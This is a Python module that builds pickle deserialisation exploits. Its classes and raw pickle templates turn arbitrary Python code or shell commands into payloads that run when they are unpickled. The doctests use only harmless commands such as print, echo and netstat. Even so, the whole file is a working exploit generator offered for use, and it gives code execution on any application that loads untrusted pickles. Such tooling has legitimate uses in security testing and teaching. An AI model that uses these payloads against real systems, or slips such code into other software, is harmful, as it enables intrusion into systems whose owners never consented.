#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
 This module implement pickle exploit.
 Make easy a pickle PAYLOAD and test it.

 To launch tests, use this command: python3 -m doctest PickleExploit.py
 To print the doc you can use: python3 -m pydoc -b

 >>> pyexploit = PyPickleExploit("print('je test', 'test2')")
 >>> pyexploit.build()
 >>> exploit_pickled = pyexploit.get_pickle_payload()
 >>> pyexploit.execute_payload()
 je test test2

 >>> shellexploit = ShellPickleExploit('echo "je test"')
 >>> shellexploit.build()
 >>> exploit_pickled = shellexploit.get_pickle_payload()
 >>> shellexploit.execute_payload(exploit_pickled)
 0
"""

__all__ = ["PickleExploit", "PyPickleExploit", "ShellPickleExploit", "Templates"]

from pickle import loads, dumps
import os
import subprocess

from typing import NewType, TypeVar
from collections.abc import Callable

PicklePayload = NewType("PicklePayload", bytes)
ObjectOrNone = TypeVar("ObjectOrNone", object, None)


class PickleExploit(object):

    """
    This class build a custom pickle exploit.

     >>> exploit = PickleExploit(print, ["je test", "test2"])
     >>> exploit.build()
     >>> exploit.functionnal_payload
     (<built-in function print>, ('je test', 'test2'))
     >>> exploit_pickled = dumps(exploit)
     >>> exploit_unpickled = loads(exploit_pickled)
     je test test2
     >>> exploit_pickled = exploit.get_pickle_payload()
     >>> exploit.execute_payload()
     je test test2
     >>> exploit.execute_payload(exploit_pickled)
     je test test2
    """

    def __init__(self, function: Callable, args: list):
        self.function = function
        self.args = args
        self.functionnal_payload = None

    def build(self) -> None:

        """
        This function build the tuple exploit.

         >>> exploit = PickleExploit(print, [str.encode("je test"), "test2"])
         >>> exploit.build()
         >>> exploit.functionnal_payload
         (<built-in function print>, (b'je test', 'test2'))
        """

        self.functionnal_payload = (self.function, tuple(self.args))

    def get_pickle_payload(self, protocol: int = 0) -> bytes:

        """
        This function return the pickle payload.

         >>> exploit = PickleExploit(print, [str.encode("je test"), "test2"])
         >>> exploit.build()
         >>> exploit_pickled = exploit.get_pickle_payload()
         >>> loads(exploit_pickled)
         b'je test' test2
        """

        return dumps(self, protocol=protocol)

    def execute_payload(self, payload: PicklePayload = None) -> ObjectOrNone:

        """
        This function execute the payload
        and return the loaded object.

         >>> exploit = PickleExploit(print, [str.encode("je test"), "test2"])
         >>> exploit.build()
         >>> exploit_pickled = exploit.get_pickle_payload()
         >>> exploit.execute_payload()
         b'je test' test2
         >>> exploit_pickled = dumps(exploit)
         >>> exploit.execute_payload(exploit_pickled)
         b'je test' test2
        """

        if payload:
            return loads(payload)
        else:
            return loads(self.get_pickle_payload())

    def __reduce__(self):
        return self.functionnal_payload


class PyPickleExploit(PickleExploit):

    """
    This class is a PickleExploit to execute
    python code.
    string_code: is a str and must be python code
    args: must be optional argument for function
    function: [OPTIONAL, default=exec] the function to call
            python code (exec, eval, ...)

     >>> pyexploit = PyPickleExploit("print('je test', 'test2')", { "print": print }, { "print": print })
     >>> pyexploit.build()
     >>> pyexploit.functionnal_payload
     (<built-in function exec>, ("print('je test', 'test2')", {'print': <built-in function print>}, {'print': <built-in function print>}))
     >>> exploit_pickled = pyexploit.get_pickle_payload()
     >>> pyexploit.execute_payload()
     je test test2
     >>> pyexploit.execute_payload(exploit_pickled)
     je test test2

     >>> pyexploit = PyPickleExploit("print(b'je test', 'test2')", { "print": print }, { "print": print }, function=eval)
     >>> pyexploit.build()
     >>> pyexploit.functionnal_payload
     (<built-in function eval>, ("print(b'je test', 'test2')", {'print': <built-in function print>}, {'print': <built-in function print>}))
     >>> exploit_pickled = pyexploit.get_pickle_payload()
     >>> pyexploit.execute_payload()
     b'je test' test2
     >>> pyexploit.execute_payload(exploit_pickled)
     b'je test' test2
    """

    def __init__(self, string_code: str, *args, function=exec):
        super().__init__(function, [string_code] + list(args))


class ShellPickleExploit(PickleExploit):

    """
    This class is a PickleExploit to execute
    command line.
    command: is a str and must be a command line
    args: must be optional argument for function
    function: [OPTIONAL, default=os.system] the function
            to execute the command line (os.system, os.popen,
            subprocess.run, ...)

     >>> shellexploit = ShellPickleExploit('echo "je test"')
     >>> shellexploit.build()
     >>> shellexploit.functionnal_payload
     (<built-in function system>, ('echo "je test"',))
     >>> exploit_pickled = shellexploit.get_pickle_payload()
     >>> shellexploit.execute_payload()
     0
     >>> shellexploit.execute_payload(exploit_pickled)
     0

     >>> shellexploit = ShellPickleExploit('netstat -h', function=subprocess.run)
     >>> shellexploit.build()
     >>> shellexploit.functionnal_payload[1]
     ('netstat -h',)
     >>> exploit_pickled = shellexploit.get_pickle_payload()
     >>> process = shellexploit.execute_payload()
     >>> process.returncode
     1
     >>> process = shellexploit.execute_payload(exploit_pickled)
     >>> process.returncode
     1
    """

    def __init__(self, command: str, *args, function=os.system):
        super().__init__(function, [command] + list(args))


class Templates:

    """
    This class implement constant to build
    custom pickle exploit based on templates

     - PYTHON_PICKLE_EXPLOIT: to build python code exploit
     - SHELL_PICKLE_EXPLOIT: to build command line exploit

     - type_: must be "python" or "shell"
     - payload: python code or command line to execute
     - function: must be exec or eval (but all builtins can be use)
     - target_system: must be a os.name ("nt" or "posix")

     >>> templated_pickle = Templates("python", "print('PAYLOAD')")
     >>> loads(templated_pickle.build())
     PAYLOAD
    """

    PYTHON_PICKLE_EXPLOIT = b"c__builtin__\nFUNCTION\np0\n(VPAYLOAD\np1\ntp2\nRp3\n."
    SHELL_PICKLE_EXPLOIT = b"cSYSTEM\nsystem\np0\n(VPAYLOAD\np1\ntp2\nRp3\n."

    def __init__(
        self,
        type_: str,
        payload: str,
        function: Callable = exec,
        target_system: str = os.name,
    ):

        """
        >>> templated_pickle = Templates("python", "print('PAYLOAD')", function=eval)
        >>> loads(templated_pickle.build())
        PAYLOAD
        """

        self.type = type_.lower()
        self.payload = payload.encode()
        self.function = function.__name__.encode()
        self.target_system = target_system.encode()

    def build(self) -> bytes:

        """
        This function build exploit and return it.

         >>> templated_pickle = Templates("python", "PAYLOAD", function=print)
         >>> loads(templated_pickle.build())
         PAYLOAD

         >>> templated_pickle = Templates("shell", "echo a")
         >>> loads(templated_pickle.build())
         0

         >>> templated_pickle = Templates("shell", "echo a", target_system="posix")
         >>> print(templated_pickle.build().decode())
         cposix
         system
         p0
         (Vecho a
         p1
         tp2
         Rp3
         .
        """

        if self.type == "python":
            self.exploit = Templates.PYTHON_PICKLE_EXPLOIT.replace(
                b"PAYLOAD", self.payload
            ).replace(b"FUNCTION", self.function)
        elif self.type == "shell":
            self.exploit = Templates.SHELL_PICKLE_EXPLOIT.replace(
                b"SYSTEM", self.target_system
            ).replace(b"PAYLOAD", self.payload)
        else:
            raise ValueError("type of Templates must be 'shell' or 'python'.")

        return self.exploit
